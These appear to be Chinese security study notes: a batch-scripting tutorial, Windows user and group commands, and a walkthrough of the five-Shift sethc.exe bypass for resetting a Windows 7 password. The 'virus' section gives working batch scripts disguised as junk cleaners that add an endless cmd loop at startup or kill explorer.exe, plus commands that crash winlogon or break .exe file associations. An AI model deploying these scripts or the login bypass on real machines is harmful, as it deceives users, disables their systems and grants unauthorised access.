目錄

批處理和病毒

第六章 使用者與組管理

破解系統密碼

---

批處理和病毒

目錄

初識批處理

一個簡單的批處理程式

1、引入

2、echo 輸出

3、變數

4、if、goto

病毒

簡單的批處理檔案一

簡單的批處理檔案二

最簡單的病毒

最簡單的病毒解藥

最簡單的指令碼

最簡單的死迴圈指令碼

整人網頁

---

初識批處理

• 如何批處理：

命名：.bat

方法：建立一個記事本檔案，然後將其擴充套件改為.bat

• 批處理作用：自上而下成批處理每一條DOS命令，直到執行到最後一條。
• 執行環境：當然是我們cmd了

迴歸我學過的任何一門語言都是從一個簡單的**程式開始的，批處理也同樣如此

一個簡單的批處理程式

1、引入

1. d:
2. cd\
3. cd temp
4. del ,/s/q

我們把幾條dos命令匯聚在一起，這就進入了批處理的範疇

---

2、echo 輸出

1. @echo off
2. color 0a
3. title 飛哥小程式v1.0
5. echo ==========================
6. echo 選單
7. echo 1、修改管理員密碼
8. echo 2、定時關機
9. echo 3、退出本程式
10. echo ===========================
12. pause

看不懂？先不急，我們先來看一下執行效果：

@echo off #關閉回顯

color 0a #設定視窗顯示顏色

1. color:
2. 指定控制檯輸出的顏色屬性
3. 顏色屬性由兩個十六進位制數字指定 -- 第一個為背景，第二個則為文字顏色。
4. 每個數字可以為以下任何值之一:
5. 0 = 黑色 8 = 灰色
6. 1 = 藍色 9 = 淡藍色
7. 2 = 綠色 A = 淡綠色
8. 3 = 湖藍色 B = 淡淺綠色
9. 4 = 紅色 C = 淡紅色
10. 5 = 紫色 D = 淡紫色
11. 6 = 黃色 E = 淡黃色
12. 7 = 白色 F = 亮白色
13. 例如: "cilor fc" 亮白色背景，淡紅色文字顏色。

title #設定程式名

例如：title 飛哥小程式v1.0

pause #暫停螢幕（沒有這條語句，我們是看不到上圖的顯示效果的，程式只會一閃而過）

3、變數

1. @echo off
2. color 0a
3. title 飛哥小程式v1.0
5. echo ==========================
6. echo 選單
7. echo 1、修改管理員密碼
8. echo 2、定時關機
9. echo 3、退出本程式
10. echo ===========================
12. set /p u=請輸入使用者名稱:
13. set /p p=請輸入新密碼:
14. net user %u% %p% >nul
17. pause

同樣我們先來看下效果：

set /p u= (字串 ） #獲取輸入的字元，將其賦值給變數u

%u% #提取變數u的值

net user 使用者名稱 密碼 #修改賬戶密碼（windows所有平臺支援）

>nul #清除一條命令執行後系統反饋

再來看一下效果：

後面的“命令成功完成”就不見了！

---

4、if、goto

1. @echo off
2. color 0a
3. title 飛哥小程式v1.0
5. :menu
6. cls
7. echo ==========================
8. echo 選單
9. echo 1、修改管理員密碼
10. echo 2、定時關機
11. echo 3、退出本程式
12. echo ===========================
14. set /p num=您的選擇是：
15. if "%num%"=="1" goto 1
16. if "%num%"=="2" goto 2
17. if "%num%"=="3" goto 3
18. echo 被鬧，好好輸！
19. pause
20. goto menu
22. :1
23. set /p u=請輸入使用者名稱:
24. set /p p=請輸入新密碼:
25. net user %u% %p% >nul
26. echo 您的密碼已經設定成功!
27. pause
28. goto menu
30. :2
31. set /p time=請輸入時間：
32. shutdown -s -t %time%
33. set /p x=是否取消（1：是，0：否）：
34. if "%x%"=="1" shutdown -a
35. goto menu
36. pause
38. :3
39. exit

分割槽塊

：menu

"menu"區塊

:1

“1”區塊

:2

“2”區塊

:3

"3"區塊

goto 區塊名 #程式跳該區塊

例如：goto menu #程式跳至“menu區塊”

if "%num%"=="1" 命令1 #如果條件成立，執行命令1；條件不成立，跳過命令1，向下走

cls #清屏

shutdown -s -t 100 #定時關機

1. 常用shutdown命令：
2. shutdown -a #取消關機
3. shutdown -s #關機
4. shutdown -f　 #強行關閉應用程式
5. shutdown -l　 #登出當前使用者
6. shutdown -r　 #關機並重啟
7. shutdown -s -t 時間　#定時關機
8. shutdown -h #休眠
9. 更多的 cmd:
10. shutdown ?
11. 檢視

好了，通過我們以上所學的命令，這樣一個簡單的批處理程式就寫完了。

---

病毒

測試環境：虛擬機器win2003

注：一些簡單的病毒程式請勿在真實機中測試

簡單的批處理檔案一

功能：偽裝垃圾清理程式新增一個開機自啟動項，無限彈出CMD視窗

1. @echo off
2. title 系統垃圾清理
3. color 2f
4. echo =======若防毒軟體惡意攔截，請選擇【允許程式的所有操作】========
5. echo.
6. echo.
7. echo :start>c:\windows\windows.bat
8. echo start cmd>>c:\windows\windows.bat
9. echo goto start>>c:\windows\windows.bat
10. copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul
11. if %errorlevel%==0 goto next
12. copy c:\windows\windows.bat "%USERPROFILE%\「開始」選單\程式\啟動" >nul
13. if %errorlevel%==1 goto error
14. :next
15. echo.
16. echo.
17. echo ====== 垃圾清理中，請不要關閉視窗======
18. echo.
19. ping -n 5 127.0.0.1 >nul
20. echo.
21. echo ====== 垃圾清理完畢，共清理垃圾500M===
22. echo.
23. echo.
24. echo ====== 建議立即重啟電腦
25. pause
26. goto ex
28. :error
29. echo.
30. echo.
31. echo ====== 程式執行失敗，請使用【管理員許可權】重新執行！======
32. echo.
33. pause
34. goto ex
36. :ex
37. exit

echo. #輸出一個空

注：系統啟動選單位置這裡是winxp和win2003的位置，至於win後續系統或其他系統，去問萬能的度娘

我們來看一下執行效果：

執行完成後我們可以看到在開始啟動項中多了一個windows.bat檔案。

重啟之後，電腦完全宕機了。

---

簡單的批處理檔案二

功能：偽裝垃圾清理程式強制終止桌面程序

1. @echo off
2. title 系統垃圾清理
3. color 2f
4. echo ====== 若有防毒軟體惡意攔截，請選擇【允許程式的所有操作】=====
5. echo.
6. echo.
8. :next
9. echo.
10. echo.
11. echo ====== 垃圾清理中，請不要關閉視窗=======
12. echo.
13. ping -n 5 127.0.0.1 >nul
14. taskkill /im explorer.exe /f >nul 2>nul
15. echo.
16. echo. ===== 完了，你係統廢了======
17. ping -n 5 127.0.0.1>nul
18. echo.
19. start c:\windows\explorer.exe
20. echo.
21. echo ====== 已經修復好了！是不是嚇壞了！！嘿嘿=========
22. pause

>nul 2>nul 訊息全部遮蔽

詳細請訪問：https://blog.csdn.net/weixin_43252204/article/details/105394751

桌面程序被殺死！

桌面程序恢復：

---

最簡單的藍屏炸彈檔案

ntsd -c q -pn winlogon.ex

分析:

ntsd #殺死程序

ntsd -c q -pn 程序名 #強制殺死程序

藍屏原因：winlogon 程序不能被殺死，我想強制殺死，系統不讓，結果導致藍屏！

對win2003有很大的殺傷力，但對win2008基本沒有殺傷力

最簡單的病毒

assoc.exe=txtfile

分析：

修改檔案關聯，導致檔案無法正常開啟

測試效果：

---

最簡單的病毒解藥

assoc.exe=exefile

只需將檔案字尾與其關聯文對應即可

---

最簡單的指令碼

方法：將.txt改為.vbs

msgbox "我最帥！"

測試效果：

---

最簡單的死迴圈指令碼

1. do
2. msgbox "我最帥！"
3. loop

測試：

效果：視窗無法關閉

解決方法：

vbs 使用微軟自帶的wscript.exe來編寫的

---

一個有趣的小指令碼，大家可以試試

1. do
2. msgbox "飛哥最帥！"
3. msgbox "小子，你對這件事有異議嗎"
4. msgbox "你要為此付出代價"
5. msgbox "從現在開始我要求你點100下滑鼠"
6. msgbox "100"
7. msgbox "99"
8. msgbox "98"
9. msgbox "97"
10. msgbox "96"
11. msgbox "95"
12. msgbox "94"
13. msgbox "93"
14. msgbox "92"
15. msgbox "91"
16. msgbox "90"
17. msgbox "...."
18. msgbox "3"
19. msgbox "2"
20. msgbox "1"
21. msgbox "如果你看到這裡，說明你確實很執著，你感動了我，請再點一下"
22. msgbox "年輕人，有時候執著也沒用，換個姿勢再來一次"
23. loop

注：可以用修改圖示軟體修改vbs檔案圖示

---

整人網頁

1. <!DOCTYPE html>
2. <html>
3. <head>
4. <meta charset="utf-8">
5. <meta http-equiv="X-UA-Compatible" content="IE=edge">
6. <title>很噁心的常見整人效果的程式碼</title>
7. <link rel="stylesheet" href="">
8. </head>
9. <body>
10. <a href="" onmouseover="alert('飛哥真帥');
11. alert('飛哥真帥');
12. alert('飛哥是真帥');
13. alert('飛哥是真帥');
14. alert('飛哥是真的帥');
15. alert('同意不！');
16. alert('不同意？');
17. alert('去死吧');
18. ">不許把滑鼠移到這裡！</a>點了真爽！！！
19. </body>
20. </html>

測試效果：

• 第六章 使用者與組管理

windows伺服器系統：win2000 win2003 win2008 win2012

linux伺服器系統：Redhat Centos

使用者管理

每個使用者有自己的唯一的SID(安全識別符號)

使用者SID

系統SID

windows 系統管理員administrator的UID是 500

普通使用者是1000 開始的

linux 系統管理員root 的UID是 0

普通使用者是1000開始

賬號密碼儲存的位置 ：C:\windows\system32\config\SAM #暴力破解，撞庫

windows系統上，預設密碼最長有效期42天（尤其是伺服器系統）

內建賬戶

給人使用的：

administrator 管理員賬號

guest 來賓賬戶

計算機服務元件

system 系統賬戶，許可權至高無上

local services 本地服務賬戶 普通許可權

network services 網路服務賬戶 普通許可權

配置檔案

windows ”使用者“

賬戶dos命令

1. net user
2. net user 賬戶名 字串 #修改密碼
3. net user 賬戶名 #檢視賬戶資訊
4. net user 賬戶名 密碼 /add #新建賬戶
5. net user 賬戶名 密碼 /del #刪除賬戶
6. net user 賬戶名 /active:yes/no #啟用或禁用賬戶

組管理

組的作用：簡化許可權賦予

賦許可權方式：

1)使用者 - 組-賦許可權

2)使用者-賦許可權

內建組（系統自帶組）

內建組的許可權已經被系統賦予

1. administrators #管理員組
2. guests #來賓組
3. users #普通使用者組
4. network #網路配置組
5. print #印表機組
6. Remote Desktop #遠端桌面組

1. net localgroup #檢視組
2. net localgroup 組名 #檢視組
3. net localgroup 組名 /add #建立組
4. net localgroup 組名 使用者名稱 /add #新增組成員
5. net localgroup 組名 使用者名稱 /del #刪除組成員
6. net localgroup 組名 /del #刪除組

伺服器遠端管理

圖形化遠端管理

執行 ：“mstsc”

telnet（命令列）\

檢視本地上所有開放的埠 cmd “netstat -an”

telnet：23

遠端桌面協議RDP：3389

破解系統密碼

利用5次shift漏洞破解win7密碼

漏洞

漏洞1：未登陸系統前連按5次shift彈出程式c:\windows\system32\sethc.exe

漏洞2：部分win7及win10系統在未進入系統時，可以通過系統修復漏洞篡改系統檔名！

注：如果win7或win10已修補此漏洞2，則無法利用

破解過程相關知識

cmd工具路徑

c:\windows\system32\cmd

使用者/賬戶密碼儲存位置

c:\windows\system32\config\SAM

修改賬戶密碼;

netuser 使用者名稱 新密碼

[網路安全學習篇附]：利用5次shift漏洞破解win7密碼（詳）

目錄

實驗 利用5次shift漏洞破解win7密碼

漏洞

實驗環境：

準備

開始

---

實驗 利用5次shift漏洞破解win7密碼

漏洞

漏洞1：未登陸系統前連按5次shift彈出程式c:\windows\system32\sethc.exe

漏洞2：部分win7及win10系統在未進入系統時，可以通過系統修復漏洞篡改系統檔名！

只要是win7或win10存在這兩個漏洞，就可對其進行破解

實驗環境：

虛擬機器：VMware Workstation 15.5 pro

虛擬機器系統：

準備

1、設定賬戶密碼

開始

2、開機進入登入介面，(這裡滑鼠一定要點選到虛擬機器裡面去)連按shift鍵5次，彈出下面的對話方塊，說明存在5次shift漏洞，這個程式的位置：c:\windows\system32\sethc.exe

思路：用cmd視窗程式來替換這個程式

3、重啟，在這個介面下把電源拔了。

那麼我們在虛擬機器裡面如何拔電源呢

(開機如果未出現此介面，建議再拔電源一次,win7一般兩次，win10一般三次）進入修復介面，這裡 當然是選擇啟動修復了，我們利用的就是啟動修復的漏洞

點選取消

它會繼續嘗試修復

等待...

好了，我們想要的介面終於出來了，點選檢視問題詳細資訊

下拉至最後

進入我們記事本

我們選擇 檔案 -- 另存為 進入以下介面

點選進入，就到我們的C盤了

依次進入目錄：windows\system32

cmd程式和貼上鍵程式都在c:\windows\system32\cmd

5次shift漏洞的程式c:\windows\system32\sethc.exe

找到我們的5次shift漏洞的程式，將這個程式重新命名（改成什麼都可以，）

我們這裡重新命名成ssss

再找到我們的cmd程式

右鍵 -- 複製 -- 貼上 -- 形成一個cmd副本，將其重新命名為sethc

將其重新命名為sethc

好了，到這裡我們就基本上已經成功了。

關閉記事本，選擇 --取消 --重新啟動

回到我們的登出介面

這次再連按5次shift,我們的cmd視窗就被調出來了

再操作一波，用這個密碼登陸系統就可以了